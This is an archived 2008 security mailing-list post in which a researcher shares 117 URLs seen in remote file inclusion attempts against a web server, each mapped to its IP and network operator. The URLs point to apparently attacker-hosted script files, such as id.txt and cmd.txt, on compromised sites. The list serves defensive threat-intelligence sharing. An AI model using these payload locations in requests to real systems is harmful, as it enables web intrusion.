[nsp-sec] RFI locations
Jose Nazario
jose at arbor.net
Thu Oct 2 14:07:02 EDT 2008
ripped through monkey's HTTP logs and came up with the attached list of
suspicious RFI attempts. spot testing reveals a variety of "hack" markers
and such.
data range:
start 01/Oct/2008:05:30:04
end 02/Oct/2008:14:02:31
117 distinct URLs, mapped to ASNs. attached.
i am looking at automating this, FYI.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
-------------- next part --------------
Bulk mode; whois.cymru.com [2008-10-02 18:04:46 +0000]
2119 | 213.115.231.5 | http://frazzworld.com/id.txt | TELENOR-NEXTEL T.net
3209 | 84.63.189.241 | http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt | Arcor IP-Network
3356 | 62.67.235.104 | http://www.beschorner86.de/cms//modules/cmd/cid.txt | LEVEL3 Level 3 Communications
3561 | 64.14.68.19 | http://www.unixserv.net/ooid.txt | SAVVIS - Savvis
3561 | 72.232.85.170 | http://www.airfaretalk.com/cheapflights/bot.txt | SAVVIS - Savvis
3595 | 216.180.239.124 | http://not-network.com/idscan9 | GNAXNET-AS - Global Net Access, LLC
3595 | 63.247.67.154 | http://www.syahrulazlan.com/login/id.txt | GNAXNET-AS - Global Net Access, LLC
3595 | 69.73.183.26 | http://tagfighters.com/images/.bash/id.txt | GNAXNET-AS - Global Net Access, LLC
3786 | 211.43.212.9 | http://www.yesoneshop.com/minjoong/technote7/data/list.txt | LGDACOM LG DACOM Corporation
3786 | 222.231.1.76 | http://www.chukaclub.com/zboard/idd.txt | LGDACOM LG DACOM Corporation
3786 | 222.231.1.76 | http://www.chukaclub.com/zboard/idd.txt | LGDACOM LG DACOM Corporation
4595 | 152.160.49.201 | http://monkey.org/redmonk/blog/p117 | ICNET - ICNet/Innovative Concepts
4595 | 152.160.49.201 | http://monkey.org/redmonk/blog/p160 | ICNET - ICNet/Innovative Concepts
4595 | 152.160.49.201 | http://monkey.org/redmonk/blog/p206 | ICNET - ICNet/Innovative Concepts
4595 | 152.160.49.201 | http://monkey.org/redmonk/blog/p207 | ICNET - ICNet/Innovative Concepts
4766 | 125.141.196.77 | http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt | KIXS-AS-KR Korea Telecom
4766 | 203.253.29.3 | http://203.253.29.3/technote//data/sistem.txt | KIXS-AS-KR Korea Telecom
4766 | 222.122.15.70 | http://staff.karl.or.kr/tt/board/skin/member/idxx.txt | KIXS-AS-KR Korea Telecom
5617 | 83.17.61.114 | http://www.varico.poznan.pl/testy/dotproject/modules/system/bot.txt | TPNET Polish Telecom_s commercial IP network
5617 | 83.19.144.26 | http://83.19.144.26/bo.do0D | TPNET Polish Telecom_s commercial IP network
6408 | 66.172.73.116 | http://www.stupidscifi.com/images/tv/special.txt | PRADO - Prado Internet Access INc.
6429 | 190.54.53.84 | http://www.codeduc.cl/components/id.txt | Telmex Chile Internet S.A.
6429 | 190.54.53.84 | http://www.codeduc.cl/components/id.txt0D | Telmex Chile Internet S.A.
7738 | 200.202.249.7 | http://sistemas.unilestemg.br/ping/idnew.txt | Telecomunicacoes da Bahia S.A.
8560 | 87.106.144.143 | http://www.misterjoomla.de/templates/rhuk_milkyway/glup.txt | ONEANDONE-AS 1&1 Internet AG
8741 | 212.223.165.230 | http://www.niederraeder-wassersport.de/chapters/umfrage/id.txt | ECORE AS - ecore Kommunikations AG
8928 | 93.93.201.55 | http://gaima.it/mambots/content/newid.txt | INTEROUTE Interoute Communications Ltd
9120 | 212.97.132.132 | http://ballboa.se/ezg_data/newfile20.txt0D | COHAESIONET Cohaesio A/S
9318 | 58.227.192.80 | http://www.minart.org/bbs/data/anang/id2.txt0D | HANARO-AS Hanaro Telecom Inc.
9318 | 58.227.192.80 | http://www.minart.org/bbs_2/id.txt | HANARO-AS Hanaro Telecom Inc.
10052 | 155.230.138.121 | http://geoedu.knu.ac.kr/search/id | KNU-AS Kyungpook National Univ.
10098 | 202.123.79.14 | http://bghk.net/ppb2/id.txt | HENDERSON-HK Henderson Data Centre Limited
10297 | 69.6.225.13 | http://hechoenlosandes.com//lite/yes.txt | COLUMBUSNAP - The Columbus Network Access Point, Inc.
10297 | 76.162.181.137 | http://www.ixp-net.com/administrator/2020/bid.txt | COLUMBUSNAP - The Columbus Network Access Point, Inc.
10297 | 76.162.181.137 | http://www.ixp-net.com/components/id.txt | COLUMBUSNAP - The Columbus Network Access Point, Inc.
11388 | 66.40.7.215 | http://www.satinvestigacion.net/foro5/includes/mini_cal/TT | MAXIM - Peer 1 Dedicated Hosting
11664 | 200.59.145.76 | http://quiroga.presencia.net/osy2.txt | AT&T Argentina S.A.
11706 | 200.176.3.141 | http://paginas.terra.com.br/lazer/aff/id3.txt | Terra Networks Brasil S/A
11798 | 69.89.17.10 | http://northamptonparentscenter.org/calendar/includes/media/mulaid.txt | BLUEHOST-AS - Bluehost Inc.
11798 | 69.89.31.74 | http://magickalforest.com//includes/idv6.txt | BLUEHOST-AS - Bluehost Inc.
11798 | 74.220.207.69 | http://www.lisapena.com//poll/lang/idfx.txt0D | BLUEHOST-AS - Bluehost Inc.
11798 | 74.220.215.84 | http://www.kjncartagena.com/clubciclista/language/ignore.txt | BLUEHOST-AS - Bluehost Inc.
12832 | 84.244.0.47 | http://www.it-service-reinl.de/administrator/error.txt | LYCOS-EUROPE Lycos Europe GmbH
14492 | 64.106.149.178 | http://www.suneradio.com/Internet-Talk-Radio-Forum/avatars/mdn.txt | DATAPIPE - DataPipe
14501 | 69.13.92.203 | http://69.13.92.203/special.txt | CIHOST - C I Host
15703 | 87.233.139.210 | http://www.woonwinkel-zevenaar.nl/editor/pulaid.txt | TRUESERVER-AS TrueServer BV AS number
16178 | 217.75.203.5 | http://www.asa-auto.ba/mambo/cache/coi.txt | LOGOSOFT-AS Logosoft d.o.o.
16178 | 217.75.203.5 | http://www.asa-auto.ba/mambo/cache/romid.txt | LOGOSOFT-AS Logosoft d.o.o.
16178 | 217.75.203.5 | http://www.asa-auto.ba/mambo/cache/test.txt | LOGOSOFT-AS Logosoft d.o.o.
16178 | 217.75.203.5 | http://www.asa-auto.ba/mambo/cache/v6id.txt | LOGOSOFT-AS Logosoft d.o.o.
16243 | 87.249.98.22 | http://www.newminiclub.nl/copyright.txt | VIRTU-AS Virtu Secure Webservices B.V.
16276 | 213.186.33.4 | http://www.erethil.com/templates/402mbo/css/css.txt | OVH OVH
17081 | 64.185.237.116 | http://superprast.net/alat/cmd.txt | XIBIG - Xibi Group, Inc.
17081 | 64.185.237.65 | http://todhostel.com/index/media/news.jpg | XIBIG - Xibi Group, Inc.
18042 | 61.63.72.17 | http://oursoultvxq.com/bbs/data/bbs/chi.txt | KBT Koos Broadband Telecom
18042 | 61.63.72.17 | http://oursoultvxq.com/bbs/data/bbs/ideex.txt | KBT Koos Broadband Telecom
18042 | 61.63.72.17 | http://oursoultvxq.com/bbs/data/bbs/idid.txt | KBT Koos Broadband Telecom
18101 | 220.227.238.58 | http://www.vishalfurnishings.com/images/stories/readme.do | RIL-IDC Reliance Infocom Ltd Internet Data Centre,
18108 | 125.214.65.34 | http://125.214.65.34/id.txt0D | FUJITSU-AP FujitsuAustraliaLtd
19166 | 64.72.119.201 | http://mailgate.freehostia.com/ident.txt0D | ALPHARED-HOUSTON - Alpha Red, INC
20495 | 84.244.138.115 | http://lecis.jw.lt/readme.jpg | WEDARE We Dare BV Autonomous System
20632 | 81.3.137.199 | http://bazisplus.ru/templates/aurora/v6id.txt | PETERSTAR-AS JSC PeterStar
20838 | 89.128.157.5 | http://www.esteponabierta.com/data/tmp | YIF-AS YIF Autonomous System
21844 | 66.98.212.167 | http://www.bikinienlaweb.com/tmp/id.txt0D | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 67.15.225.117 | http://www.tenispe.com.br/fiatitaliana/images/joomla | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 69.93.219.66 | http://www.hosernews.ca/cmd.txt | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 70.85.227.66 | http://freeadventistsingles.com/rid | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 70.87.152.2 | http://www.denosin.nexusradio.co.uk/bodo.txt | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 74.53.109.226 | http://cafegay.com/templates/base/xsl/group_first_topics.xsl/bo.do | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
21844 | 74.53.109.226 | http://cafegay.com/templates/base/xsl/group_first_topics.xsl/echo | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
24900 | 212.112.227.166 | http://www.dekanat-asd.de//components/sistem.gif | IPX-SERVER IPX Server GmbH
24940 | 85.10.213.5 | http://www.alevichat.com/idN.txt | HETZNER-AS Hetzner Online AG RZ-Nuernberg
24940 | 85.10.213.5 | http://www.alevichat.com/ids.txt | HETZNER-AS Hetzner Online AG RZ-Nuernberg
25532 | 87.242.99.137 | http://websnap.ru//wp-content/uploads/id2.txt | MASTERHOST-AS .masterhost autonomous system
25653 | 69.72.147.10 | http://cbmarketer.com/images/t_pane.jpg/id.txt | FORTRESSITX - FortressITX
25653 | 69.72.147.10 | http://cbmarketer.com/images/t_pane.jpg/id.txt | FORTRESSITX - FortressITX
25653 | 69.72.161.58 | http://geoforum.global-enterpriseonline.com/chat/mstid.txt | FORTRESSITX - FortressITX
26101 | 66.218.77.68 | http://www.geocities.com/goodyes20/id.txt | YAHOO-3 - Yahoo!
28842 | 89.17.220.221 | http://vnc2009.webcindario.com/id.txt | VELOXIA-AS =====================================
28842 | 89.17.220.221 | http://vnc2009.webcindario.com/idnew.txt | VELOXIA-AS =====================================
29131 | 78.129.205.21 | http://danieledm.altervista.org/PhP/id_dany.txt | RAPIDSWITCH-AS RapidSwitch Ltd
29131 | 78.129.205.48 | http://reav1985.altervista.org/idv6.txt | RAPIDSWITCH-AS RapidSwitch Ltd
29131 | 78.129.205.48 | http://reav1985.altervista.org/idv6.txt | RAPIDSWITCH-AS RapidSwitch Ltd
29278 | 87.229.26.189 | http://www.gyorieskuvo.hu/script/alb | DENINET-HU-AS Deninet Ltd. HU
29671 | 77.232.66.66 | http://www.unocare.de/hack-id.txt | SERVAGE Servage GmbH
29863 | 72.1.114.161 | http://ubintu.100megsfree8.com/id.gif | DATA393-ASN1 - Data393
30496 | 72.249.91.51 | http://veruci.com/images/gha-id.txt | COLO4 - Colo4Dallas LP
30496 | 72.249.91.51 | http://veruci.com/images/nat.jpg | COLO4 - Colo4Dallas LP
30496 | 72.249.91.51 | http://veruci.com/images/roxx.jpg | COLO4 - Colo4Dallas LP
31034 | 62.149.140.76 | http://www.edoloshop.it/images/inv | ARUBA-ASN Aruba.it Network
31034 | 62.149.140.87 | http://lnx.padellino.com/prc.gif | ARUBA-ASN Aruba.it Network
31103 | 62.141.48.47 | http://www.co-ko-indians.de/modules/Album/image/id3.txt | KEYWEB-AS Keyweb AG
32392 | 69.6.225.13 | http://hechoenlosandes.com//lite/yes.txt | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
32392 | 72.41.70.222 | http://forsalebyowner.com.au/adpics/crutz.txt | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
32392 | 76.162.181.137 | http://www.ixp-net.com/administrator/2020/bid.txt | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
32392 | 76.162.181.137 | http://www.ixp-net.com/components/id.txt | OPENTRANSFER-ECOMMERCE - Ecommerce Corporation
32613 | 70.38.38.230 | http://www.kungfuclasicounion.es/hgjkiopl/id.txt | IWEB-AS - iWeb Technologies Inc.
33070 | 72.32.94.197 | http://www.stormpages.com/thepheng/child3.txt0D | RMH-14 - Rackspace.com, Ltd.
33070 | 72.32.94.197 | http://www.stormpages.com/thepheng/v6-idbr.txt | RMH-14 - Rackspace.com, Ltd.
34011 | 80.67.17.70 | http://www.trade-an-item.com/docs/sql/readme.txt | DOMAINFACTORY domainfactory GmbH
34432 | 85.158.181.11 | http://www.ballettschule-tulln.at/htaccess/osid6.txt | PHH-AS ProfiHost, www.profihost.com, Germany
36752 | 68.180.151.74 | http://ppattojo.com/chid.txt | YAHOO-SP1 - Yahoo
38220 | 203.19.59.30 | http://www.destroythemap.com/Core/modules/mx_blogs/includes/id.txt | SIS-GROUP-SYD-AS-AP SIS Group Datacentre Sydney
40966 | 217.112.37.31 | http://www.shanti-medical-centre.co.uk/services/xuxuon.txt | VALUEHOST-AS Valuehost
41126 | 89.111.176.95 | http://www.lnds.ru/cache/sistem.txt | CENTROHOST-AS JSC Centrohost
41828 | 91.185.200.59 | http://www.zajla.com//theme/phpAutoVideo/LightTwoOh/id.txt | TUSMOBIL TUSMOBIL - core network
44112 | 77.222.40.18 | http://www.energobalt-spb.ru/error_log | SWEB-AS SpaceWeb JSC
44652 | 93.93.112.23 | http://joselunacamacho.com/portal/templates/archzone/kecebongid.txt | SYNC-AS SYNC Intertainment
More information about the nsp-security
mailing list